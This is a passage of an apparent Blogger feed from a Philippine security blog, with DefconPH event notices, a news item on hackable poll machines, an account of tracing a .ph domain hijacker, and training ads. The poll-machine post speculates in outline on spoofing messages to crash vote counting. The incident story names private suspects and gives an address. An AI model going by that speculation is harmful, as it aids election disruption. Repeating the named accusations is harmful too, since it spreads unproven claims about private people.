/&gt;Speaker: theStare&lt;br /&gt;&lt;br /&gt;Synopsis: Recent developments concerning regulatory requirements, the current financial turmoil and rising security threats to organizations have opened the doors of business for various security service providers. Organizations are looking for service providers who understand their business and its associated risks, capable of assessing their current security posture, identify any gaps, and provide cost-effective recommendations that can reasonably address these gaps. They are searching for professionals who can perform these services in an organized manner, using a sound approach and a proven methodology. This talk deals with the details of managing penetration testing engagements, right from proposal preparation up to report delivery.&lt;br /&gt;&lt;br /&gt;The Waledac Botnet&lt;br /&gt;&lt;br /&gt;Speaker: Bullsh!t&lt;br /&gt;&lt;br /&gt;Synopsis: Botnet technology and techniques are continuously evolving, and currently, the Waledac botnet is probably the most advanced botnet out there.&lt;br /&gt;&lt;br /&gt;In this presentation, we will give a brief overview on botnet evolution, the technical aspects of Waledac, the botnet, what it does, and how the bot masters are raking in cash out of this.&lt;br /&gt;&lt;br /&gt;Hackista 2009 (Øpen Hack Challenge)&lt;br /&gt;&lt;br /&gt;Mechanics: The goal of this challenge is to obtain administrative level privileges on a windows 2000 server with no security patches by exploiting vulnerabilities in the RPC/LSASS Services on the target machine. The target machine IP address will be announced prior to the start of the challenge. Upon successful compromise, create a text file with your name on the target machine's desktop and notify any of the the goons for verification. The first one to compromise the machine after verification will be considered the winner and gets a change to do a demo on the methods he used. The first one to create their HANDLE.txt on the desktop of the compromised machine wins the game.&lt;br /&gt;&lt;br /&gt;Tools: Any hacking tools are allowed, Metasploit, Nessus, Nmap etc..&lt;br /&gt;&lt;br /&gt;Rules: No direct DoS on the server, anyone caught DoSing the server will automatically disqualify you from the game.&lt;br /&gt;&lt;br /&gt;Price: The first one to create handle.txt will be getting black badge, black badge entitles you for lifetime access to the DEFCON Philippines event.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1059146003393712871?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1059146003393712871/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1059146003393712871' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1059146003393712871'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1059146003393712871'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/03/defconph-beertalk-ii-manila.html' title='Defconph BeerTalk II (Manila)'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-1658657397599714</id><published>2009-03-07T21:54:00.002+08:00</published><updated>2009-03-07T22:22:19.197+08:00</updated><title type='text'>Poll machines prone to hacking -- IT expert</title><content type='html'>&lt;a href="http://www.abs-cbnnews.com/nation/03/05/09/poll-machines-prone-hacking-it-expert"&gt;Original Story&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The high-tech poll machines that will be used by the Commission on Elections (COMELEC) in the 2010 elections are prone to hacking, an IT expert said Thursday.&lt;br /&gt;&lt;br /&gt;“The [poll] machines are only computers, they can be hacked. Someone can insert bad instructions into it and manipulate data,” IT expert Ike Señeres, former director-general of the National Computer Center, told ABS-CBN’s morning show, “Umagang Kay Ganda.”&lt;br /&gt;&lt;br /&gt;Señeres explained that computers with vulnerable operating systems (OS) can be infected by viruses.&lt;br /&gt;&lt;br /&gt;He said that the machines used by COMELEC in the ARMM elections used Windows, which he said is vulnerable to virus and hacking.&lt;br /&gt;&lt;br /&gt;He added that the poll machines can also be manipulated by an “untrustworthy” person.&lt;br /&gt;&lt;br /&gt;Señeres said that if COMELEC would allow him, he will sit in a room and if given enough time, he can hack into the poll machines and manipulate the results of the elections.&lt;br /&gt;&lt;br /&gt;COMELEC spokesman James Jimenez admitted that there are no “fool-proof” systems and even an automated election can still be rigged.&lt;br /&gt;&lt;br /&gt;Jimenez, however, said that critics of the automated elections should be reminded that the COMELEC is trying to replace a “system that is flawed and vulnerable.”&lt;br /&gt;&lt;br /&gt;“With the automated system, it is new and it is less vulnerable,” he said.&lt;br /&gt;&lt;br /&gt;Señeres, meanwhile, said that the possibility of the automated being hacked can still be prevented by helping COMELEC guard the process.&lt;br /&gt;&lt;br /&gt;PCOS not OMR&lt;br /&gt;&lt;br /&gt;COMELEC Chairman Jose Melo, meanwhile, said that the poll body will be using precinct count optical scan (PCOS), an improved version of the optical mark reader (OMR), which was used in the ARMM elections.&lt;br /&gt;&lt;br /&gt;Melo said that compared with the OMR, PCOS has better security features and less vulnerable to cheating.&lt;br /&gt;&lt;br /&gt;He said PCOS can take pictures of the ballots inserted by voters into the voting machines. He said the ballots' images are transmitted to COMELEC for better monitoring of the ballots' conditions.&lt;br /&gt;&lt;br /&gt;The COMELEC had said that it will set up at least 80,000 PCOS machines nationwide during the May 2010 elections.&lt;br /&gt;&lt;br /&gt;It said 14,000 units will be deployed around Metro Manila, 13,000 units in urban areas, 3,000 units in problem areas and 50,000 to each voting precincts in the rural areas.&lt;br /&gt;&lt;br /&gt;OES on standby&lt;br /&gt;&lt;br /&gt;Melo, meanwhile, said the COMELEC will put as standby the proposed "open election system" or the half manual, half automated elections.&lt;br /&gt;&lt;br /&gt;He said if ever the winning supplier of the PCOS machines fail to meet COMELEC standards, it will be forced to switch to the open system.&lt;br /&gt;&lt;br /&gt;"We won't have enough time to conduct another bidding, so we have to go manual," Melo said.&lt;br /&gt;&lt;br /&gt;He said the COMELEC will publish the terms of reference for the meeting this month and start the actual bidding by April.&lt;br /&gt;&lt;br /&gt;He said they will set the final testing for the poll machines on November 17.&lt;br /&gt;&lt;br /&gt;By December 2009, the COMELEC will start educating teachers and their employees on how to use the poll machines.&lt;br /&gt;&lt;br /&gt;In a marathon session that started Wednesday night, the Senate approved the supplemental budget bill for the COMELEC to implement automation in the 2010 elections.&lt;br /&gt;&lt;br /&gt;Senators approved the budget bill with a provision for "transparency and accuracy in the selection of the relevant technology of the voting machines to be used for the May 10, 2010 automated and local elections."&lt;br /&gt;&lt;br /&gt;The Senate passed the supplemental budget on its last session day before it goes on a five-week Lenten recess starting March 7.&lt;br /&gt;&lt;br /&gt;House Bill 5715 was passed by the House of Representatives on Monday evening and was then transmitted to the Senate the next day.&lt;br /&gt;&lt;br /&gt;The supplemental budget bill will still have to go through a bicameral debate.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;&lt;br /&gt;Automation shortens the window needed to cheat. Couple that with PCOS, a nice md5sum+timestamp hashing algorithm, a secure way of transmission, and that would be way way better than the system used before. &lt;br /&gt;&lt;br /&gt;It could be possible to install trojans prior to the election but that would require physical access to the (possibly hundreds of) machines since I doubt that they would be online prior to the election. And I'm sure (actually hoping) that they're going to be heavily guarded prior to deployment. Weak point could be in the counting mechanism itself. You could somehow sniff the connection, find out the receiving ip address(es), determine the protocol format (probably POST data to a webserver with the md5sum+timestamp I was talking about earlier), send a spoofed corrupted message, and (hopefully?) crash the counting mechanism. A DoS would be enough to undermine the validity of the election. Politically, that would also be enough.   &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-1658657397599714?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/1658657397599714/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=1658657397599714' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1658657397599714'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/1658657397599714'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/03/poll-machines-prone-to-hacking-it.html' title='Poll machines prone to hacking -- IT expert'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-6061499975492789824</id><published>2009-03-01T18:54:00.004+08:00</published><updated>2009-03-01T19:32:18.691+08:00</updated><title type='text'>SILICAQ Released</title><content type='html'>&lt;a href="http://www.immunityinc.com/products-silica.shtml"&gt;SILICAQ&lt;/a&gt; is a handheld penetration testing and security assessment device sold by &lt;a href="http://www.immunityinc.com"&gt;Immunity, Inc.&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;It's predecessor SILICA used the Nokia 770 as the hardware platform. SILICAQ seems to be using different hardware.&lt;br /&gt;&lt;br /&gt;SILICA price  = $3600.00&lt;br /&gt;SILICAQ price = $8500.00&lt;br /&gt;&lt;br /&gt;Using the current Peso exchange rate;&lt;br /&gt;&lt;br /&gt;$8500.00 X 48 = PHP 408,000.00&lt;br /&gt;&lt;br /&gt;Here's a &lt;a href="http://www.sulit.com.ph/index.php/view+classifieds/id/1161839/Honda+CRV+2000+(Taffeta+White)+*Manual+transmission*"&gt;Honda CRV SUV&lt;/a&gt; being sold for PHP 400,000.00 =)&lt;br /&gt;&lt;br /&gt;Heh, quite expensive! &lt;br /&gt;&lt;br /&gt;I think I'm gonna sell my personal penetration testing netbook. It's an eee 900 running Ubuntu. Some features;&lt;br /&gt;- uses non standard drivers that enable you to inject and sniff data wirelesly&lt;br /&gt;- Nmap installed&lt;br /&gt;- Metasploit installed&lt;br /&gt;- Aircrack-ng installed with a single command to scan, inject packets, and crack &lt;br /&gt;the WEP key for an AP you select&lt;br /&gt;- ability to connect to (and scan/exploit) a wired LAN (I'm guessing SILICAQ can't do this =) )&lt;br /&gt;- Karmetasploit installed&lt;br /&gt;- Virtualbox installed with a Windows XP virtual machine to give access to all your Windows-based tools.&lt;br /&gt;- Firefox and Open Office installed for all your normal internet surfing, work-related stuff&lt;br /&gt;- Different pentest tools installed for you to play with&lt;br /&gt;&lt;br /&gt;Normal eee 900 specs except that it's upgraded to 2 gig RAM&lt;br /&gt;&lt;br /&gt;Price is PHP 19,500. Interested buyers email me at sujiru@gmail.com =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-6061499975492789824?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/6061499975492789824/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=6061499975492789824' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6061499975492789824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6061499975492789824'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/03/silicaq-released.html' title='SILICAQ Released'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4678922409480119343</id><published>2009-02-28T17:10:00.002+08:00</published><updated>2009-02-28T17:17:05.229+08:00</updated><title type='text'>Sulit.com.ph Hacking Incident</title><content type='html'>Awesome story of how the guy who hacked sulit.com.ph was traced. It would be very interesting to follow his (possible) ensuing trial.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://dotph.domains.ph/hacking-dotph"&gt;Original story source &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;So let's say you run a website with huge, huge traffic. You have a big, dedicated community, and you're raking in the ad money. Then one day, you see that your site has been hacked. You can't find a way to get inside to fix it, and your formerly awesome site is now one big ad generating revenue for somebody. That sucks, right?&lt;/p&gt; &lt;p&gt;That is what happened to Sulit.com.ph, the largest free classified ads site in the company.&lt;/p&gt; &lt;p&gt;Back in November 6, 2008, Sulit, along with some high-traffic Filipino websites, all using the .ph domain, mysteriously went down and were pointed to SEDO advertising pages. This happened just after makeuseof.com was hacked and was pointed to an advertising page. Of course, panic ensued. Onthe web, there was rampant speculation of domain hacking and poisoning, and for a while, everybody was scared of their domains going down.&lt;/p&gt; &lt;p&gt;As it turned out, this wasn't just an ordinary case of a hacker trying to prove he could do something. This guy wanted to actually profit from his misdeeds, a case of fame taking a back seat to fortune.&lt;/p&gt; &lt;p&gt;While this was going on, we at dotPH were working round the clock to stop further hacking, and more importantly, to catch this hacker.&lt;/p&gt; &lt;h3 style="font-size: 14px; color: rgb(27, 98, 160);"&gt;How to catch a hacker&lt;/h3&gt; &lt;p&gt;Everything you do on the web leaves a digital fingerprint behind. Whenever you make a transaction, leave a comment on a blog entry, or even watch a video at youtube, those websites will take note of your IP address. It's like leaving behind a digital trail of crumbs for internet detectives to follow. It's like CSI, only without the UV lights and the gross bodily fluid splatters.&lt;/p&gt; &lt;p&gt;dotPH head developer Sherwin Daganato soon checked our logs during the time it happened. He was able to paint a pretty clear picture on what the hacker did, step-by-step. On 9:24 PM of November 6, 2008, the hacker, using Internet Explorer 7 on a Windows XP computer, logged into our system and exploited a vunerability in our website. He tried to log in to Sulit.com.ph's account. Then he clicked on the "Forgot Password" button. Using a specially-crafted cookie, he was able to get into our system without having to enter the correct password. He was now inside Sulit.com.ph's account. First thing he did was to change the login information there, effectively locking out the legitimate owner of of the account. He then pointed the domain to his own Sedo account, so that he is able to monetize any traffic made by Sulit.com.ph. The hacker also used the same process on more .ph sites.&lt;/p&gt; &lt;p&gt;Sherwin was able to get the IP addresses of the hacker. We also know that the hacker, in all of the times he broke into our system, used MS Internet Explorer (Version 7), and the same Operating System version (MS Windows XP). We noticed that the hacker was using the same series of IP addresses, and he was using Bayantel. A quick GeoIP scan of the IP addresses point it to Legaspi City, Albay.&lt;/p&gt; &lt;p&gt;We contacted Bayantel to give us more information regarding the IP addresses. At first they were reluctant to cooperate because disclosing information about their subscribers isn't really company policy. We explained that one of their accounts was used in a hacking incident, which is against their terms and conditions. Bayantel was pretty cooperative afterwards, giving us the name the subscriber: Mark Anthony Clemente. Clemente's registered address is at Clemente Building, Gov. Forbes St., Legaspi City, Albay.&lt;/p&gt; &lt;h3 style="font-size: 14px; color: rgb(27, 98, 160);"&gt;Following the money trail&lt;/h3&gt; &lt;p&gt;Sulit.com.ph and the other hacked sites were pointed to a SEDO advertising account. We were pretty sure that the SEDO account contains the real name of the hacker, because how else is he going to claim his money? Calling SEDO, we explained the situtation, and we needed to get the name of the hacker behind the account.&lt;/p&gt; &lt;p&gt;SEDO was reluctant to give us the information at first. It was understandable, because nobody wants to have their financial information readily available. SEDO told us that they suspended some accounts that made a lot of money in a short period of time. We asked them if they could give us info on these suspended accounts. Again, we got a "we can't answer that" from SEDO. In a gamble, we told them that we'll say some domains, and they tell us if they encountered those domains, or if those domains are familliar to them.&lt;/p&gt; &lt;p&gt;"So, is Sulit.com.ph familliar to you?" we asked SEDO.&lt;/p&gt; &lt;p&gt;"Yes."&lt;/p&gt; &lt;p&gt;And we mentioned around five domains, all getting a "Yes" from the SEDO representative. By the time we mentioned the fifth domain, the representative just laughed because everything was right on the money. The noose was tightening around our hacker.&lt;/p&gt; &lt;h3 style="font-size: 14px; color: rgb(27, 98, 160);"&gt;Closing In&lt;/h3&gt; &lt;p&gt;Since we learned of the IP addresses used by the hacker, we had been monitoring our system to see if the same IP addresses get in again. True enough, since the hacker was already able to get inside our system easily the first time around, he got greedy and created seven (7) new domains using the same IP address range used to hack the domains. Interestingly, the seven new domains had an expiry period of ten (10) years each. These new domains were created under the reseller account of an Alex Laguilles, from Gov. Forbes St., Legaspi City, Albay.&lt;/p&gt; &lt;p&gt;We just needed a way to confirm if he owns those domains. Laguilles had registered his legitimate and hacked domains under fake names and addresses like “Alex Pogi”. Using fake names and/or addresses were against our terms of use.&lt;/p&gt; &lt;p&gt;We called Laguilles, hoping to gain more information. During the call, our representative immediately identified himself as a dotPH employee, and Laguilles went silent for a good few moments. Afterwards, he was audibly nervous. We decided to not confront him on the hacking issue just yet. Instead, we asked him about the domains he legitimately owns, and why were they registered under fake names like "Alex Pogi".&lt;/p&gt; &lt;p&gt;He admitted that he owns those domains, but mid-conversation he backtracks and says that he just registered those domains for a friend. We also asked him if he uses MS Internet Explorer (Version 7), and the same Operating System version (MS Windows XP) when he surfs the internet, and he says yes.&lt;/p&gt; &lt;p&gt;We advised him to change the ownership of the domains to real names and addresses.&lt;/p&gt; &lt;p&gt;At the end of the call, he asks us "Yun lang? (That's it?)," apparently expecting something worse.&lt;/p&gt; &lt;p&gt;Result: He basically admits to accessing the same dotPH account used in the hacking, and using the same computer and browser the hacker used.&lt;/p&gt; &lt;p&gt;We then called SEDO again to see if both hacked domains and new domains were pointed to the same account. SEDO confirmed that they were, and that they had already suspended all payments because of our concern and also the unusually high volume of traffic -- usually indicates fraudulent clickthroughs.&lt;/p&gt; &lt;p&gt;All we need to close this case would be to prove that Lagulles was indeed the hacker, and to see if he was working with somebody else.&lt;/p&gt; &lt;h3 style="font-size: 14px; color: rgb(27, 98, 160);"&gt;Going Cloak and Dagger&lt;/h3&gt; &lt;p&gt;We sent Mario Inocando to Legaspi City. As our operative was en route to Albay, we were gathering all that we can about Legaspi City, Clemente Building, Mark Clemente, and Alex Laguilles. Looking up the address on Wikimapia to make sure our operative knows the exact location, we coordinated with our operative every step of the way.&lt;/p&gt; &lt;p&gt;We even provided our operative with a spy camera (yes, that camera inspired hundreds of bad James Bond jokes). This proved to be pretty useful afterwards, because our operative was able to send us surveilance photos of Clemente Building. Well, the operative was at a loss on how to approach the people inside the building and we needed the photos to figure out a plan.&lt;/p&gt;   &lt;p&gt;There was an office called Megapixel on the ground floor. We decided that the best way to approach them without arousing any suspicion was to pretend to be interested in their business. We called them up. As we fished for information about Clemente and Laguilles, we found out that Megapixel is owned by Clemente. We told them that we were sending somebody so our operative won't come off as suspicious.&lt;/p&gt; &lt;p&gt;True enough, our operative was able to talk to the people at Vodacom. Even though Clememte and Laguilles were not present at that time, he was able to gain a great deal of information.&lt;/p&gt; &lt;p&gt;We found out that Alex Laguilles worked as a developer/programmer for Vodacom, another company owned by Clemente. Vodacom is also housed in the same building. Laguilles used the office internet connection that Clemente owns (which explains the IP addresses) to hack into our system. Interestingly enough, the people there knew about the hacking incident, even though they were reluctant to disclose any of the details. So far, no evidence points to Clemente being involved in this, except that his internet account being used (probably without his knowledge) for the hacking incident.&lt;/p&gt; &lt;p&gt;The hacking incident took place on November 6, and by Monday the 10th we had already ID'ed the guy and found out where he operates from. It took us some more time to get the documentation needed to file a case, after which we handed all our evidence to NBI. Laguilles should be expecting a knock on his door any time soon.&lt;/p&gt; &lt;p&gt;Now all evidence points to Laguilles not being in the hacking game for long. He probably found a hole in our security and he used it for monetary gain. There was no real effort at all to cover his tracks. There will be more hackers, and they will not be as careless as Laguilles. dotPH will remain vigilant for more hacking incidents in our system, and end any hacking activity as soon as we detect it, find the source, and use legal action agains the perpetrators.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4678922409480119343?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4678922409480119343/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4678922409480119343' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4678922409480119343'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4678922409480119343'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/02/sulitcomph-hacking-incident.html' title='Sulit.com.ph Hacking Incident'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5333126901939687236</id><published>2009-01-11T16:17:00.005+08:00</published><updated>2009-01-11T17:16:48.214+08:00</updated><title type='text'>BDO ATM Cmd Shell</title><content type='html'>Great shot by &lt;a href="http://www.yugatech.com/blog/curious/bdo-atm-machine-on-command-line/"&gt;Yugatech&lt;/a&gt; of a &lt;a href="http://www.bdo.com.ph/"&gt;Banco De Oro&lt;/a&gt; ATM machine dropping to a cmd shell and executing an ftp script.  The ip address shown is inside their local network and uploads are sent to a "backup" folder. Seems to be a backup script executed by the "at" service which is why the script is executed by svchost.exe. No idea why it would show the cmd window although unless the /interactive switch was included although that would be very weird on such a machine.  Some exploits do execute a cmd shell through svchost though. =)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/bdo-atm-machine.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 480px; height: 359px;" src="http://sujiru.googlepages.com/bdo-atm-machine.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5333126901939687236?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5333126901939687236/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5333126901939687236' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5333126901939687236'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5333126901939687236'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/01/bdo-atm-hacked.html' title='BDO ATM Cmd Shell'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5350080853365114939</id><published>2009-01-06T13:57:00.005+08:00</published><updated>2009-01-06T14:13:53.997+08:00</updated><title type='text'>I.T. Security Bootcamp 2009</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/Bootcamp_invitation.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 514px; height: 504px;" src="http://sujiru.googlepages.com/Bootcamp_invitation.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Brought to you by &lt;a href="http://bitshieldsecurity.com/html/events.html"&gt;Bitshield&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Other events scheduled are;&lt;br /&gt;&lt;br /&gt;EC-Council Certified Security Analyst/Licensed Penetration Tester&lt;br /&gt;             January 23, 24, 30, 31 &amp;amp; February 13, 2009&lt;br /&gt;&lt;br /&gt;Certified Ethical Hacking and Countermeasures                      &lt;div class="style23" align="left"&gt;                     &lt;div class="style7" align="left"&gt; February 20, 21, 27, 28 &amp;amp; March 6, 2009&lt;/div&gt;                   &lt;/div&gt;&lt;br /&gt;Certified Ethical Hacking and Countermeasures                      &lt;div class="style23" align="left"&gt;IT Security Essentials&lt;br /&gt;"Are You Safe And Secure?"   January 26, 2009&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-style: italic;"&gt;The I.T. Security Bootcamp 2009&lt;/span&gt; costs 7,&lt;span style="font-style: italic;"&gt;000.00 Php but you get to stay at a resort in Puerto Galera =) There's probably a separate fee for the CompTIA Security+ Examination though, the ad didn't state that =)&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5350080853365114939?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5350080853365114939/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5350080853365114939' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5350080853365114939'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5350080853365114939'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2009/01/it-security-bootcamp-2009.html' title='I.T. Security Bootcamp 2009'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7003039938388537677</id><published>2008-12-14T20:10:00.002+08:00</published><updated>2008-12-14T20:13:29.840+08:00</updated><title type='text'>Defconph.org's Bloggers Conference Meeting</title><content type='html'>In an email sent to it's members, the organizers of defconph.org gave a brief summary of what happened at the meeting with members of the Cebu Bloggers Society.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Greetings DefconPH Forum Members,&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-style: italic;"&gt; This is to inform you that the Bloggers Conference Meeting with DefconPH this morning (Dec. 14, 2008) was successful with the presence of some members of Cebu Bloggers Society.  We started at around 1030AM and finished at around 12noon, location was at Bo's Coffee Shop near Cebu Doctor's College.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-style: italic;"&gt; Agenda during the Bloggers Conference Meeting (Dec. 14, 2008):&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; a) Intro about DefconPH as an organization&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; b) Overview about the topics on Dec. 20, 2008&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; c) What to expect from DefconPH&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; d) Future Plans of DefconPH&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; e) Mechanics of some games during the Con (June 2009)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; f) Inviting members to help organize future events of DefconPH&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; g) Look for sponsors for the Con on June 2009&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; h) TShirts to be distributed on Dec. 17, 2008 at the event venue&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; i) History of well known IT Professionals / h**kers&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; j) And many more...&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-style: italic;"&gt; DefconPH is not a company but an organization.  The success of the organization entirely depends on its members.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-style: italic;"&gt; Like what I said to Semprix, let's start small using our available resources and manpower.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-style: italic;"&gt; Thanks for your support and we're always looking for members who can actively contribute for the success of DefconPH, collectively.&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-style: italic;"&gt; Thanks and more power to you as well.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7003039938388537677?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7003039938388537677/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7003039938388537677' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7003039938388537677'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7003039938388537677'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/12/defconphorgs-bloggers-conference.html' title='Defconph.org&apos;s Bloggers Conference Meeting'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-8556387563983377338</id><published>2008-12-14T18:38:00.002+08:00</published><updated>2008-12-14T18:40:42.270+08:00</updated><title type='text'>Globe Network 